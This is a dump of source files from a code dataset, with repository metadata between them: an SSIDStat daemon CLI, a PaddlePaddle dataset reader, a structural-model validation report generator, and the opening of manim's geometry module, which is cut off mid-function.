    parser.add_argument("--stop", action="store_true", help="stop running ssidstat daemon")
    parser.add_argument("--restart", action="store_true", help="restart running ssidstat daemon")

    opts = parser.parse_args()

    # --version short-circuits every other action.
    if opts.version:
        print 'SSIDStat/SSIDStatd v{}'.format(ssidstat.__version__)
        return

    monitord = monitor.MonitorDaemon(opts.db, opts.pidfile, opts.interval, stdout=opts.outlog, stderr=opts.errlog)

    # --status only reports; it never changes daemon state.
    if opts.status:
        if monitord.is_running():
            print 'ssidstat daemon is running'
        else:
            print 'ssidstat daemon is not running'
        return

    # Exactly one lifecycle action is performed; default is start.
    if opts.stop:
        monitord.stop()
    elif opts.restart:
        monitord.restart()
    else:
        monitord.start()

if __name__ == '__main__':
    main()
| 38.28
| 144
| 0.757576
|
4a07b19861e12b9191d5e01b29c82f7c59eb2ce0
| 3,552
|
py
|
Python
|
ST_DM/KDD2021-MSTPAC/code/ST-PAC/frame/core/dataset_reader.py
|
zhangyimi/Research
|
866f91d9774a38d205d6e9a3b1ee6293748261b3
|
[
"Apache-2.0"
] | 1,319
|
2020-02-14T10:42:07.000Z
|
2022-03-31T15:42:18.000Z
|
ST_DM/KDD2021-MSTPAC/code/ST-PAC/frame/core/dataset_reader.py
|
green9989/Research
|
94519a72e7936c77f62a31709634b72c09aabf74
|
[
"Apache-2.0"
] | 192
|
2020-02-14T02:53:34.000Z
|
2022-03-31T02:25:48.000Z
|
ST_DM/KDD2021-MSTPAC/code/ST-PAC/frame/core/dataset_reader.py
|
green9989/Research
|
94519a72e7936c77f62a31709634b72c09aabf74
|
[
"Apache-2.0"
] | 720
|
2020-02-14T02:12:38.000Z
|
2022-03-31T12:21:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
################################################################################
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""
File: frame/core/dataset_reader.py
Date: 2019/05/07 18:56:25
Brief:
Generate sample for dataset trainer
"""
from __future__ import print_function
import logging
import numpy as np
import logging
import sys
import os
import random
import paddle.fluid.incubate.data_generator as dg
from utils.object_transform import ObjectTransform
class DatasetReader(dg.MultiSlotDataGenerator):
    """
    Data reader inherited from Paddle's MultiSlotDataGenerator.

    Deserializes a dataset object and the list of wanted input slot
    names, then turns each input text line into training samples.
    """
    def init_reader(self, obj_str, input_names):
        """
        Initialize the reader from two pickled strings.

        obj_str: pickled dataset object providing parse_oneline().
        input_names: pickled collection of slot names to keep.
        """
        # NOTE(review): pickle deserialization is only safe because these
        # strings come from the launching process — never feed untrusted data.
        self.dataset_instance = ObjectTransform.pickle_loads_from_str(obj_str)
        self.input_names = ObjectTransform.pickle_loads_from_str(input_names)

    def generate_sample(self, line):
        """
        Return a generator of (slot_name, value) samples parsed from one
        input text line, restricted to the configured input slots.
        """
        def _iterator():
            """
            closure over `line`; one parsed line may yield many samples
            """
            for sample in self.dataset_instance.parse_oneline(line):
                # Drop slots the trainer did not ask for.
                truncate_sample = [(key, value) for key, value in sample if key in self.input_names]
                yield truncate_sample
        return _iterator

    def generate_batch(self, samples):
        """
        This function needs to be overridden by the user to process the
        generated samples from generate_sample(self, str) function
        It is usually used as batch processing when a user wants to
        do preprocessing on a batch of samples, e.g. padding according to
        the max length of a sample in the batch

        Args:
            samples(list tuple): generated sample from generate_sample

        Returns:
            a python generator, the same format as return value of generate_sample

        Example:
            .. code-block:: python

                import paddle.fluid.incubate.data_generator as dg
                class MyData(dg.DataGenerator):

                    def generate_sample(self, line):
                        def local_iter():
                            int_words = [int(x) for x in line.split()]
                            yield ("words", int_words)
                        return local_iter

                    def generate_batch(self, samples):
                        def local_iter():
                            for s in samples:
                                yield ("words", s[1].extend([s[1][0]]))
                mydata = MyData()
                mydata.set_batch(128)
        """
        # Identity pass-through: no batch-level preprocessing is applied.
        def _local_iter():
            for sample in samples:
                yield sample
        return _local_iter
if __name__ == "__main__":
    # Launched by the dataset trainer: argv[1] is the pickled dataset
    # object, argv[2] the pickled input slot names; samples are read
    # from stdin in MultiSlot format.
    dataset_reader = DatasetReader()
    dataset_reader.init_reader(sys.argv[1], sys.argv[2])
    dataset_reader.run_from_stdin()
| 32.290909
| 100
| 0.593468
|
4a07b2a357f2014f411627b7a49fe1edaea23259
| 14,976
|
py
|
Python
|
master/pyext/src/validation/Report.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | null | null | null |
master/pyext/src/validation/Report.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | 23
|
2020-12-09T22:27:29.000Z
|
2022-03-30T18:01:43.000Z
|
master/pyext/src/validation/Report.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | 1
|
2022-03-21T22:55:24.000Z
|
2022-03-21T22:55:24.000Z
|
###################################
# Script :
# 1) Contains class to write dictionary
# for jinja2/write HTML files/PDF files
# and supplementary table
#
# ganesans - Salilab - UCSF
# ganesans@salilab.org
###################################
import pytz
import jinja2
import pandas as pd
import sys,os,glob
import numpy as np
import validation
from validation import excludedvolume,get_input_information
from validation import molprobity
from validation import get_plots,sas,sas_plots
from validation import cx,cx_plots
from validation import utility
#import pdfkit
import datetime,time
import pickle
from multiprocessing import Process, Queue, Pool, Manager
from collections import Counter
import argparse
import json
class WriteReport(object):
    def __init__(self,mmcif_file):
        # Path to the deposited mmCIF file this report describes.
        self.mmcif_file = mmcif_file
        # Parsed entry information (IHM library wrapper) reused by all steps.
        self.I=get_input_information(self.mmcif_file)
def run_entry_composition(self,Template_Dict:dict)->dict:
'''
get entry composition, relies on IHM library
'''
start=time.process_time()
name=self.mmcif_file.split('.')[0].split('_')[0]
if self.I.get_ensembles():
ensemble_info=utility.dict_to_JSlist(self.I.get_ensembles())
else:
ensemble_info=None
Template_Dict['ensemble_info']=ensemble_info
Template_Dict['sphere']=self.I.check_sphere()
Template_Dict['num_ensembles']=self.I.check_ensembles()
RB,flex,RB_nos,all_nos=self.I.get_RB_flex_dict()
Template_Dict['Rigid_Body']=RB_nos
Template_Dict['Flexible_Unit']=all_nos-RB_nos
Template_Dict['RB_list']=utility.dict_to_JSlist_rows(RB,flex)
Template_Dict['RB']=utility.get_RB(utility.dict_to_JSlist_rows(RB,flex))
Template_Dict['flex']=utility.get_flex(utility.dict_to_JSlist_rows(RB,flex))
Template_Dict['ID']=self.I.get_id()
Template_Dict['ID_w']=self.I.get_id().split()
Template_Dict['ID_T']=self.I.get_id()[0:6]+'_'+self.I.get_id()[6:]
Template_Dict['ID_R']=(self.I.get_id()[0:6]+'_'+self.I.get_id()[6:]).split()
Template_Dict['Molecule']=self.I.get_struc_title()
Template_Dict['Title']=self.I.get_title()
Template_Dict['Authors']=self.I.get_authors()
Template_Dict['Entry_list']=utility.dict_to_JSlist(self.I.get_composition())
Template_Dict['number_of_molecules']=self.I.get_number_of_models()
Template_Dict['model_names']=self.I.get_model_names()
Template_Dict['number_of_software']=self.I.get_software_length()
Template_Dict['soft_list']=utility.dict_to_JSlist(self.I.get_software_comp())
Template_Dict['number_of_datasets']=self.I.get_dataset_length()
Template_Dict['Data']=[i.upper() for i in list(set(self.I.get_dataset_comp()['Dataset type']).difference({'Experimental model','Comparative model'}))]
Template_Dict['Datasets_list']=utility.dict_to_JSlist(self.I.get_dataset_comp())
Template_Dict['Protocols_number']=self.I.get_protocol_number()
Template_Dict['Sampling_list']=utility.dict_to_JSlist(self.I.get_sampling())
Template_Dict['num_chains']=int(len(self.I.get_composition()['Chain ID']))/int(len(list(Counter(self.I.get_composition()['Model ID']).keys())))
return Template_Dict
def run_model_quality(self,Template_Dict:dict)->(dict,dict,dict,dict,dict):
'''
get excluded volume for multiscale models
get molprobity info for atomic models
exception: models with DNA--we need a way to assess models with DNA
'''
if self.I.check_sphere()<1:
#global clashscore; global rama; global sidechain;
exv_data=None
I_mp=molprobity.get_molprobity_information(self.mmcif_file)
if I_mp.check_for_molprobity():
filename = os.path.abspath(os.path.join(os.getcwd(), 'static/results/',str(Template_Dict['ID'])+'_temp_mp.txt'))
if os.path.exists(filename):
d_mp={}
print ("Molprobity analysis file already exists...\n...assuming clashscores, Ramachandran and rotamer outliers have already been calculated")
with open(filename,'rb') as fp:
d_mp['molprobity']=pickle.load(fp)
f_rota=os.path.abspath(os.path.join(os.getcwd(), 'static/results/',str(Template_Dict['ID'])+'_temp_rota.txt'))
with open(f_rota,'rb') as fp:
d_mp['rota']=pickle.load(fp)
f_rama=os.path.abspath(os.path.join(os.getcwd(), 'static/results/',str(Template_Dict['ID'])+'_temp_rama.txt'))
with open(f_rama,'rb') as fp:
d_mp['rama']=pickle.load(fp)
f_clash=os.path.abspath(os.path.join(os.getcwd(), 'static/results/',str(Template_Dict['ID'])+'_temp_clash.txt'))
with open(f_clash,'rb') as fp:
d_mp['clash']=pickle.load(fp)
else:
print ("Molprobity analysis is being calculated...")
manager = Manager()
d_mp=manager.dict()
utility.runInParallel(I_mp.run_clashscore(d_mp),I_mp.run_ramalyze(d_mp),I_mp.run_rotalyze(d_mp),I_mp.run_molprobity(d_mp))
a,b=I_mp.process_molprobity(d_mp['molprobity'])
Template_Dict['bond']=len(a); Template_Dict['angle']=len(b)
global clashscore;global rama;global sidechain
clashscore,rama,sidechain=I_mp.get_data_for_quality_at_glance(d_mp['molprobity'])
Template_Dict['molp_b']=utility.dict_to_JSlist(I_mp.molprobity_detailed_table_bonds(a))
Template_Dict['molp_a']=utility.dict_to_JSlist(I_mp.molprobity_detailed_table_angles(b))
Template_Dict['rotascore']=utility.dict_to_JSlist(I_mp.rota_summary_table(I_mp.process_rota(d_mp['rota'])))
Template_Dict['rotalist']=utility.dict_to_JSlist(I_mp.rota_detailed_table(I_mp.process_rota(d_mp['rota'])))
Template_Dict['ramascore']=utility.dict_to_JSlist(I_mp.rama_summary_table(I_mp.process_rama(d_mp['rama'])))
Template_Dict['ramalist']=utility.dict_to_JSlist(I_mp.rama_detailed_table(I_mp.process_rama(d_mp['rama'])))
clashscores,Template_Dict['tot']=I_mp.clash_summary_table(d_mp['clash'])
Template_Dict['clashscore_list']=utility.dict_to_JSlist(clashscores)
Template_Dict['clashlist']=I_mp.clash_detailed_table(d_mp['clash'])
Template_Dict['assess_atomic_segments']='Clashscore: '+ str(clashscore) + ', Ramachandran outliers: '+ str(rama)+ '% '+', Sidechain outliers: '+str(sidechain)+'%'
Template_Dict['assess_excluded_volume']=['Not applicable']
else:
if I_mp.check_for_molprobity()==False:
self.I.rewrite_mmcif()
I_mp=molprobity.get_molprobity_information('test.cif')
print ("file rewritten")
if I_mp.check_for_molprobity():
print ("Molprobity analysis is being calculated...")
manager = Manager()
d_mp=manager.dict()
try:
runInParallel(I_mp.run_clashscore(d_mp),I_mp.run_ramalyze(d_mp),I_mp.run_rotalyze(d_mp),I_mp.run_molprobity(d_mp))
a,b=I_mp.process_molprobity(d_mp['molprobity'])
Template_Dict['bond']=len(a); Template_Dict['angle']=len(b)
clashscore,rama,sidechain=I_mp.get_data_for_quality_at_glance(d_mp['molprobity'])
Template_Dict['molp_b']=utility.dict_to_JSlist(I_mp.molprobity_detailed_table_bonds(a))
Template_Dict['molp_a']=utility.dict_to_JSlist(I_mp.molprobity_detailed_table_angles(b))
Template_Dict['rotascore']=utility.dict_to_JSlist(I_mp.rota_summary_table(I_mp.process_rota(d_mp['rota'])))
Template_Dict['rotalist']=utility.dict_to_JSlist(I_mp.rota_detailed_table(I_mp.process_rota(d_mp['rota'])))
Template_Dict['ramascore']=utility.dict_to_JSlist(I_mp.rama_summary_table(I_mp.process_rama(d_mp['rama'])))
Template_Dict['ramalist']=utility.dict_to_JSlist(I_mp.rama_detailed_table(I_mp.process_rama(d_mp['rama'])))
clashscores,Template_Dict['tot']=I_mp.clash_summary_table(d_mp['clash'])
Template_Dict['clashscore_list']=utility.dict_to_JSlist(clashscores)
Template_Dict['clashlist']=I_mp.clash_detailed_table(d_mp['clash'])
Template_Dict['assess_atomic_segments']='Clashscore: '+ str(clashscore) + ', Ramachandran outliers: '+ str(rama)+ '% '+', Sidechain outliers: '+str(sidechain)+'%'
Template_Dict['assess_excluded_volume']=['Not applicable']
except:
print ("Molprobity cannot be calculated...")
clashscore=None
rama=None
sidechain=None
else:
Template_Dict['assess_atomic_segments']='Not applicable'
file=os.getcwd()+'Output/results/'+str(Template_Dict['ID'])+'exv.txt'
if os.path.exists(file):
print ("Excluded volume file already exists...")
with open(file, 'r+') as inf:
line=[ln.replace('[','').replace(']','').replace(',','').split() for ln in inf.readlines()]
exv_data={'Models':line[0],'Excluded Volume Satisfaction (%)':line[1], 'Number of violations':line[2]}
else:
print ("Excluded volume is being calculated...")
I_ev=excludedvolume.get_excluded_volume(self.mmcif_file)
model_dict=I_ev.get_all_spheres()
exv_data=I_ev.run_exc_vol_parallel(model_dict)
Template_Dict['excluded_volume']=utility.dict_to_JSlist(exv_data)
Template_Dict['assess_excluded_volume']=utility.exv_readable_format(exv_data)
clashscore=None
rama=None
sidechain=None
return Template_Dict,clashscore,rama,sidechain,exv_data
    def run_sas_validation(self,Template_Dict:dict)->(dict,dict,dict):
        '''
        Collect SAS validation information (from SASCIF or JSON files)
        into Template_Dict; returns (Template_Dict, sas_data, sas_fit),
        the latter two empty when the entry has no SAS dataset.
        '''
        if self.I.check_for_sas(self.I.get_dataset_comp()):
            Template_Dict['sas']=["True"]
            I_sas=sas.sas_validation(self.mmcif_file)
            Template_Dict['p_val']=utility.dict_to_JSlist(I_sas.get_pvals())
            Template_Dict['sasdb_code']=I_sas.get_SASBDB_code()
            # The *_dep variants are fallbacks for older/deprecated SASBDB
            # layouts; the bare except intentionally covers any parse failure.
            try:
                Template_Dict['parameters_volume']=utility.dict_to_JSlist(I_sas.get_parameters_vol_many())
            except:
                Template_Dict['parameters_volume']=utility.dict_to_JSlist(I_sas.get_parameters_vol_many_dep())
            try:
                Template_Dict['parameters_mw']=utility.dict_to_JSlist(I_sas.get_parameters_mw_many())
            except:
                Template_Dict['parameters_mw']=utility.dict_to_JSlist(I_sas.get_parameters_mw_many_dep())
            Template_Dict['pddf_info']=utility.dict_to_JSlist(I_sas.get_pddf_info())
            Template_Dict['number_of_fits']=I_sas.get_total_fits()
            Template_Dict['chi_table']=utility.dict_to_JSlist(I_sas.get_chi_table())
            Template_Dict['rg_table']=utility.dict_to_JSlist(I_sas.get_rg_table_many())
            Template_Dict['sasdb_code_fits']=I_sas.get_sasdb_code_fits()
            Template_Dict['Data_quality']=utility.get_rg_data(I_sas.get_rg_for_plot())
            Template_Dict['validation_input']=utility.get_rg_data_fits(I_sas.get_fits_for_plot())
            if len(Template_Dict['validation_input'])<1:
                Template_Dict['validation_input']=['Fit of model to data has not been deposited']
            sas_data=I_sas.get_rg_for_plot()
            sas_fit=I_sas.get_fits_for_plot()
        else:
            # No SAS dataset in this entry: return empty plot inputs.
            sas_data={}
            sas_fit={}
        return Template_Dict,sas_data,sas_fit
def run_sas_validation_plots(self, Template_Dict: dict):
    '''
    Generate SAS validation plots from SASCIF or JSON (SASBDB) files.

    Plot generation is best-effort: any failure (missing or malformed
    SAS data) is ignored so that report generation can continue.
    '''
    if self.I.check_for_sas(self.I.get_dataset_comp()):
        Template_Dict['sas'] = ["True"]
        I_sas = sas.sas_validation(self.mmcif_file)
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate; ordinary plotting errors are deliberately
        # suppressed (best-effort behavior preserved).
        try:
            I_sas_plt = validation.sas_plots.sas_validation_plots(self.mmcif_file)
            I_sas.modify_intensity()
            I_sas.get_pofr_errors()
            I_sas_plt.plot_multiple()
            I_sas_plt.plot_pf()
            I_sas_plt.plot_Guinier()
            # 'number_of_fits' is set by run_sas_validation; default to 0
            # instead of relying on a swallowed KeyError.
            if Template_Dict.get('number_of_fits', 0) > 0:
                I_sas_plt.plot_fits()
        except Exception:
            pass
def run_cx_validation(self, Template_Dict: dict) -> (dict, dict):
    '''
    Get crosslinking-MS validation information.

    Computes per-model crosslink satisfaction, stores it in Template_Dict
    under 'Cx Fit <key>' entries, appends it to 'validation_input', and
    returns (cx_fit, Template_Dict). cx_fit is empty when the entry has
    no crosslinking dataset.
    '''
    if self.I.check_for_cx(self.I.get_dataset_comp()):
        Template_Dict['cx'] = ["True"]
        I_cx = cx.cx_validation(self.mmcif_file)
        xl_df = I_cx.get_xl_data()  # NOTE(review): unused; kept in case the call has side effects — confirm
        model_df = I_cx.get_df_for_models()
        cx_fit = I_cx.get_violation_plot(model_df)
        for key, value in cx_fit.items():
            Template_Dict['Cx Fit ' + str(key)] = value
        # Append to any existing validation input (e.g. from SAS); the
        # original used a bare try/except as a key-presence test, which
        # also hid unrelated errors.
        fits = utility.get_cx_data_fits(cx_fit)
        if 'validation_input' in Template_Dict:
            Template_Dict['validation_input'].extend(fits)
        else:
            Template_Dict['validation_input'] = fits
    else:
        cx_fit = dict()
    return cx_fit, Template_Dict
def run_cx_validation_plots(self, Template_Dict: dict):
    '''
    Generate crosslinking-MS validation plots (intra-molecule grid,
    per-structure grid, and distance distributions).
    '''
    if self.I.check_for_cx(self.I.get_dataset_comp()):
        Template_Dict['cx'] = ["True"]
        cx_plt = validation.cx_plots.cx_validation_plots(self.mmcif_file)
        cx_plt.make_gridplot_intra()
        cx_plt.make_gridplot_struc()
        cx_plt.plot_distributions()
def run_quality_glance(self, clashscore: dict, rama: dict,
                       sidechain: dict, exv_data: dict,
                       sas_data: dict, sas_fit: dict,
                       cx_fit: dict):
    '''
    get quality at glance image; will be updated as validation report is updated

    Aggregates the per-category validation results (MolProbity clashscore,
    Ramachandran and sidechain outliers, excluded volume, SAS data/fits,
    crosslink fits) into a single summary figure.
    '''
    I_plt = get_plots.plots(self.mmcif_file)
    I_plt.plot_quality_at_glance(clashscore, rama, sidechain, exv_data,
                                 sas_data, sas_fit, cx_fit)
def run_supplementary_table(self,
                            Template_Dict,
                            location='N/A',
                            physics='Information about physical principles was not provided',
                            method_details='N/A',
                            sampling_validation='N/A',
                            validation_input=['-'],
                            cross_validation='N/A',
                            Data_quality=['-'],
                            clustering='N/A',
                            resolution='N/A'):
    '''
    get supplementary table, will be updated as validation report is updated

    Fills Template_Dict with entry metadata (title, ID, subunits, datasets,
    software, sampling method, ensembles/clusters, restraints, precision).
    NOTE(review): the mutable defaults (validation_input, Data_quality) are
    shared across calls; safe only because they are never mutated here.
    '''
    # Clustering description derived from the deposited ensemble info.
    if (self.I.get_ensembles() is not None) and (utility.all_same(self.I.get_ensembles()['Clustering method'])):
        Template_Dict['clustering'] = self.I.get_ensembles()['Clustering method'][0]
    elif self.I.get_ensembles() is not None:
        Template_Dict['clustering'] = ', '.join(self.I.get_ensembles()['Clustering method'])
    else:
        Template_Dict['clustering'] = 'Not applicable'
    Template_Dict['location'] = location
    Template_Dict['complex_name'] = self.I.get_struc_title().lower()
    Template_Dict['PDB_ID'] = self.I.get_id()
    Template_Dict['Subunits'] = utility.get_subunits(self.I.get_composition())
    Template_Dict['datasets'] = utility.get_datasets(self.I.get_dataset_details()) if self.I.get_dataset_details() is not None else 'Not provided or used'
    Template_Dict['physics'] = physics
    # NOTE(review): `location` is appended to the software string — looks
    # intentional (link to deposition scripts?) but confirm.
    Template_Dict['software'] = utility.get_software(self.I.get_software_comp()) + location
    Template_Dict['struc'] = self.I.get_atomic_coverage()
    Template_Dict['method'] = utility.get_method_name(self.I.get_sampling())
    Template_Dict['method_type'] = utility.get_method_type(self.I.get_sampling())
    Template_Dict['method_details'] = method_details
    Template_Dict['models'] = ', '.join(self.I.get_ensembles()['Number of models']) if self.I.get_ensembles() is not None else 'Not applicable'
    Template_Dict['sampling_validation'] = sampling_validation
    Template_Dict['feature'] = self.I.get_ensembles()['Clustering feature'][0] if self.I.get_ensembles() is not None else 'Not applicable'
    Template_Dict['cross_validation'] = cross_validation
    Template_Dict['model_precision'] = ', '.join([i + 'Å' for i in self.I.get_ensembles()['Cluster precision']]) if self.I.get_ensembles() is not None else 'Model precision can not be calculated with one structure'
    Template_Dict['restraint_info'] = utility.get_restraints_info(self.I.get_restraints()) if self.I.get_restraints() is not None else 'Not provided or used'
    # Only set defaults if earlier validation steps did not populate these.
    if 'Data_quality' not in list(Template_Dict.keys()):
        Template_Dict['Data_quality'] = Data_quality
    if 'validation_input' not in list(Template_Dict.keys()):
        Template_Dict['validation_input'] = validation_input
    # NOTE(review): this unconditionally overwrites the ensemble-derived
    # 'clustering' value computed at the top of this method with the
    # `clustering` argument (default 'N/A') — looks unintentional; confirm.
    Template_Dict['clustering'] = clustering
    Template_Dict['resolution'] = resolution
    return Template_Dict
| 48.466019
| 213
| 0.744324
|
4a07b387c1938b173c936db8cac73e19817fbbe6
| 98,974
|
py
|
Python
|
manim/mobject/geometry.py
|
vagrid/manim
|
723e645abce9c86cdf40c98959157e6ff93896a0
|
[
"MIT"
] | null | null | null |
manim/mobject/geometry.py
|
vagrid/manim
|
723e645abce9c86cdf40c98959157e6ff93896a0
|
[
"MIT"
] | null | null | null |
manim/mobject/geometry.py
|
vagrid/manim
|
723e645abce9c86cdf40c98959157e6ff93896a0
|
[
"MIT"
] | 1
|
2021-08-23T06:57:07.000Z
|
2021-08-23T06:57:07.000Z
|
r"""Mobjects that are simple geometric shapes.
Examples
--------
.. manim:: UsefulAnnotations
:save_last_frame:
class UsefulAnnotations(Scene):
def construct(self):
m0 = Dot()
m1 = AnnotationDot()
m2 = LabeledDot("ii")
m3 = LabeledDot(MathTex(r"\alpha").set_color(ORANGE))
m4 = CurvedArrow(2*LEFT, 2*RIGHT, radius= -5)
m5 = CurvedArrow(2*LEFT, 2*RIGHT, radius= 8)
m6 = CurvedDoubleArrow(ORIGIN, 2*RIGHT)
self.add(m0, m1, m2, m3, m4, m5, m6)
for i, mobj in enumerate(self.mobjects):
mobj.shift(DOWN * (i-3))
"""
# Public API of the geometry module: names re-exported by `from ... import *`.
__all__ = [
    "TipableVMobject",
    "Arc",
    "ArcBetweenPoints",
    "CurvedArrow",
    "CurvedDoubleArrow",
    "Circle",
    "Dot",
    "AnnotationDot",
    "LabeledDot",
    "Ellipse",
    "AnnularSector",
    "Sector",
    "Annulus",
    "Line",
    "DashedLine",
    "TangentLine",
    "Elbow",
    "Arrow",
    "Vector",
    "DoubleArrow",
    "CubicBezier",
    "Polygram",
    "Polygon",
    "RegularPolygram",
    "RegularPolygon",
    "Star",
    "ArcPolygon",
    "ArcPolygonFromArcs",
    "Triangle",
    "ArrowTip",
    "Rectangle",
    "Square",
    "RoundedRectangle",
    "Cutout",
    "Angle",
    "RightAngle",
    "ArrowCircleFilledTip",
    "ArrowCircleTip",
    "ArrowSquareTip",
    "ArrowSquareFilledTip",
]
import math
import warnings
from typing import Iterable, Optional, Sequence
import numpy as np
from colour import Color
from manim.mobject.opengl_mobject import OpenGLMobject
from .. import config, logger
from ..constants import *
from ..mobject.mobject import Mobject
from ..mobject.types.vectorized_mobject import DashedVMobject, VGroup, VMobject
from ..utils.color import *
from ..utils.iterables import adjacent_n_tuples, adjacent_pairs
from ..utils.simple_functions import fdiv
from ..utils.space_ops import (
angle_between_vectors,
angle_of_vector,
compass_directions,
line_intersection,
normalize,
regular_vertices,
rotate_vector,
)
from .opengl_compatibility import ConvertToOpenGL
class TipableVMobject(VMobject, metaclass=ConvertToOpenGL):
    """
    Meant for shared functionality between Arc and Line.

    Functionality can be classified broadly into these groups:

        * Adding, Creating, Modifying tips
            - add_tip calls create_tip, before pushing the new tip
              into the TipableVMobject's list of submobjects
            - stylistic and positional configuration
        * Checking for tips
            - Boolean checks for whether the TipableVMobject has a tip
              and a starting tip
        * Getters
            - Straightforward accessors, returning information pertaining
              to the TipableVMobject instance's tip(s), its length etc
    """

    def __init__(
        self,
        tip_length=DEFAULT_ARROW_TIP_LENGTH,
        normal_vector=OUT,
        tip_style={},
        # NOTE(review): mutable default `tip_style={}` is shared across
        # instances; safe only while it is never mutated in place — confirm.
        **kwargs,
    ):
        self.tip_length = tip_length
        self.normal_vector = normal_vector
        self.tip_style = tip_style
        super().__init__(**kwargs)

    # Adding, Creating, Modifying tips
    def add_tip(self, tip=None, tip_shape=None, tip_length=None, at_start=False):
        """
        Adds a tip to the TipableVMobject instance, recognising
        that the endpoints might need to be switched if it's
        a 'starting tip' or not.
        """
        if tip is None:
            tip = self.create_tip(tip_shape, tip_length, at_start)
        else:
            self.position_tip(tip, at_start)
        self.reset_endpoints_based_on_tip(tip, at_start)
        self.asign_tip_attr(tip, at_start)
        self.add(tip)
        return self

    def create_tip(self, tip_shape=None, tip_length=None, at_start=False):
        """
        Stylises the tip, positions it spatially, and returns
        the newly instantiated tip to the caller.
        """
        tip = self.get_unpositioned_tip(tip_shape, tip_length)
        self.position_tip(tip, at_start)
        return tip

    def get_unpositioned_tip(self, tip_shape=None, tip_length=None):
        """
        Returns a tip that has been stylistically configured,
        but has not yet been given a position in space.
        """
        if tip_shape is None:
            tip_shape = ArrowTriangleFilledTip
        if tip_length is None:
            tip_length = self.get_default_tip_length()
        # Tip inherits this mobject's color unless tip_style overrides it.
        color = self.get_color()
        style = {"fill_color": color, "stroke_color": color}
        style.update(self.tip_style)
        tip = tip_shape(length=tip_length, **style)
        return tip

    def position_tip(self, tip, at_start=False):
        # Last two control points, defining both
        # the end, and the tangency direction
        if at_start:
            anchor = self.get_start()
            handle = self.get_first_handle()
        else:
            handle = self.get_last_handle()
            anchor = self.get_end()
        # Rotate the tip so it points along the curve's tangent at the anchor,
        # then translate its tip_point onto the anchor.
        tip.rotate(angle_of_vector(handle - anchor) - PI - tip.tip_angle)
        tip.shift(anchor - tip.tip_point)
        return tip

    def reset_endpoints_based_on_tip(self, tip, at_start):
        # Shrink the path so it ends at the tip's base instead of under it.
        if self.get_length() == 0:
            # Zero length, put_start_and_end_on wouldn't work
            return self
        if at_start:
            self.put_start_and_end_on(tip.base, self.get_end())
        else:
            self.put_start_and_end_on(self.get_start(), tip.base)
        return self

    def asign_tip_attr(self, tip, at_start):
        # (sic: "asign" — misspelled upstream; kept for API compatibility)
        if at_start:
            self.start_tip = tip
        else:
            self.tip = tip
        return self

    # Checking for tips
    def has_tip(self):
        return hasattr(self, "tip") and self.tip in self

    def has_start_tip(self):
        return hasattr(self, "start_tip") and self.start_tip in self

    # Getters
    def pop_tips(self):
        # Remove tips from this mobject, restore the untrimmed endpoints,
        # and return the removed tips in a group.
        start, end = self.get_start_and_end()
        result = self.get_group_class()()
        if self.has_tip():
            result.add(self.tip)
            self.remove(self.tip)
        if self.has_start_tip():
            result.add(self.start_tip)
            self.remove(self.start_tip)
        self.put_start_and_end_on(start, end)
        return result

    def get_tips(self):
        """
        Returns a VGroup (collection of VMobjects) containing
        the TipableVMObject instance's tips.
        """
        result = self.get_group_class()()
        if hasattr(self, "tip"):
            result.add(self.tip)
        if hasattr(self, "start_tip"):
            result.add(self.start_tip)
        return result

    def get_tip(self):
        """Returns the TipableVMobject instance's (first) tip,
        otherwise throws an exception."""
        tips = self.get_tips()
        if len(tips) == 0:
            raise Exception("tip not found")
        else:
            return tips[0]

    def get_default_tip_length(self):
        return self.tip_length

    def get_first_handle(self):
        return self.get_points()[1]

    def get_last_handle(self):
        return self.get_points()[-2]

    def get_end(self):
        # With a tip attached, the visual end is the tip's point, not the
        # (trimmed) path's end.
        if self.has_tip():
            return self.tip.get_start()
        else:
            return super().get_end()

    def get_start(self):
        if self.has_start_tip():
            return self.start_tip.get_start()
        else:
            return super().get_start()

    def get_length(self):
        # Straight-line distance between endpoints (not arc length).
        start, end = self.get_start_and_end()
        return np.linalg.norm(start - end)
class Arc(TipableVMobject):
    """A circular arc.

    Examples
    --------
    A simple arc of angle Pi.

    .. manim:: ArcExample
        :save_last_frame:

        class ArcExample(Scene):
            def construct(self):
                self.add(Arc(angle=PI))
    """

    def __init__(
        self,
        radius: float = 1.0,
        start_angle=0,
        angle=TAU / 4,
        num_components=9,
        arc_center=ORIGIN,
        **kwargs,
    ):
        if radius is None:  # apparently None is passed by ArcBetweenPoints
            radius = 1.0
        self.radius = radius
        self.num_components = num_components
        self.arc_center = arc_center
        self.start_angle = start_angle
        self.angle = angle
        # Set by get_arc_center when the normals' intersection can't be found.
        self._failed_to_get_center = False
        super().__init__(**kwargs)

    def generate_points(self):
        # Cairo-renderer point initialization: unit arc, then scale + shift.
        self.set_pre_positioned_points()
        self.scale(self.radius, about_point=ORIGIN)
        self.shift(self.arc_center)

    # Points are set a bit differently when rendering via OpenGL.
    # TODO: refactor Arc so that only one strategy for setting points
    # has to be used.
    def init_points(self):
        self.set_points(
            Arc.create_quadratic_bezier_points(
                angle=self.angle,
                start_angle=self.start_angle,
                n_components=self.num_components,
            )
        )
        self.scale(self.radius, about_point=ORIGIN)
        self.shift(self.arc_center)

    @staticmethod
    def create_quadratic_bezier_points(angle, start_angle=0, n_components=8):
        # Sample 2n+1 points on the unit circle; even-indexed samples become
        # anchors and odd-indexed ones handles, pushed out by 1/cos(theta/2)
        # so each quadratic segment stays tangent to the circle.
        samples = np.array(
            [
                [np.cos(a), np.sin(a), 0]
                for a in np.linspace(
                    start_angle,
                    start_angle + angle,
                    2 * n_components + 1,
                )
            ]
        )
        theta = angle / n_components
        samples[1::2] /= np.cos(theta / 2)
        points = np.zeros((3 * n_components, 3))
